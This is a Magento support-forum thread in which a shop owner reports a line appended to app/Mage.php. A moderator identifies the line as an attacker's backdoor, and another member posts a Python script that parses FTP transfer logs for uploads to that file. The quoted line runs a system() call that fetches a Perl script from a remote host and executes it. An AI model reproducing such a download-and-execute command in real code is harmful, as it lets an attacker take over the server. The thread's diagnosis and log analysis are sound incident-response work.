Magento Forum

Known security flaw? Mage.php - Magento 1.4.1.1
 
Alex Leonard
Member
 
Total Posts:  43
Joined:  2010-02-03
 

Hi there,

We’ve just run into a potential security issue with an install of Magento 1.4.1.1 we have, and I’d love to get any advice or find out if anyone else has come across this issue.

So app/Mage.php had this line of code written at the end of the file:

system("id > /tmp/id;wget -q http://xxx.xxx.xxx.xxx/ppp -O /tmp/p.pl;perl /tmp/p.pl");

I’ve x’d out the IP address in question.

Could this be a bug in Magento or PHP? Has anyone else had this issue?

Cheers,
Alex

 
 
thebod
Moderator
 
Total Posts:  81
Joined:  2010-08-11
 

Hello,

I have bad news :(
Your Magento installation seems to be backdoored by an attacker.

This piece of code is not part of Magento and acts like a little backdoor.
Could you please send me the IP address by PM or mail? Then I’ll take a look at the downloaded backdoor file and analyse the payload.

Best
thebod

 
 
sysgradegmbh
Member
 
Total Posts:  37
Joined:  2009-09-22
 

If you have access to your FTP logs, you may want to search them for any accesses to app/Mage.php in the past as a first step to find out whether the file has been altered using FTP access. It seems to have happened quite frequently in the past that malware crawls for FTP credentials in order to infect websites, so I would go and look there first.
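
The FTP-log check suggested above, as an added example that is not part of the original thread: it assumes the FTP server writes the common xferlog format (the wu-ftpd layout that vsftpd and ProFTPD can also produce), and the sample log lines, addresses and the `deploy` account are constructed.

```python
import re

# xferlog fields: 5-token date, transfer seconds, remote host, byte count,
# filename, type (a/b), action flag, direction (o=download, i=upload,
# d=delete), access mode, user, service, auth method, auth id, status (c/i).
XFERLOG = re.compile(
    r"^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) "
    r"(?P<secs>\d+) (?P<host>\S+) (?P<size>\d+) (?P<path>.+) "
    r"(?P<type>[ab]) (?P<flag>\S+) (?P<dir>[oid]) (?P<mode>[agr]) "
    r"(?P<user>\S+) (?P<svc>\S+) (?P<auth>[01]) (?P<authid>\S+) "
    r"(?P<status>[ci])$"
)

def writes_to(lines, suffix="app/Mage.php"):
    """Return uploads and deletes whose path ends in *suffix*."""
    hits = []
    for line in lines:
        m = XFERLOG.match(line.strip())
        if not m or m["dir"] == "o":      # unparsable line or plain download
            continue
        if m["path"] == suffix or m["path"].endswith("/" + suffix):
            hits.append({
                "time": m["ts"], "host": m["host"], "user": m["user"],
                "action": "upload" if m["dir"] == "i" else "delete",
                "bytes": int(m["size"]),
                "complete": m["status"] == "c",
            })
    return hits

# Constructed sample: a normal deploy, then a download of Mage.php followed
# seconds later by a slightly larger re-upload from a different address.
SAMPLE_LOG = """\
Mon Oct 11 09:14:02 2010 1 198.51.100.20 48211 /var/www/shop/skin/logo.png b _ i r deploy ftp 0 * c
Tue Oct 12 22:40:51 2010 1 203.0.113.77 31870 /var/www/shop/app/Mage.php b _ o r deploy ftp 0 * c
Tue Oct 12 22:41:07 2010 1 203.0.113.77 31961 /var/www/shop/app/Mage.php b _ i r deploy ftp 0 * c
Wed Oct 13 08:02:33 2010 2 198.51.100.20 10422 /var/www/shop/app/etc/local.xml a _ o r deploy ftp 0 * c
"""

if __name__ == "__main__":
    for hit in writes_to(SAMPLE_LOG.splitlines()):
        print("{time}  {action:6}  {host}  user={user}  {bytes} bytes".format(**hit))
```

Any hit that does not match a known deployment is worth comparing against the file's modification time; if the log shows no write at all, the change came in through some other path than FTP.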

 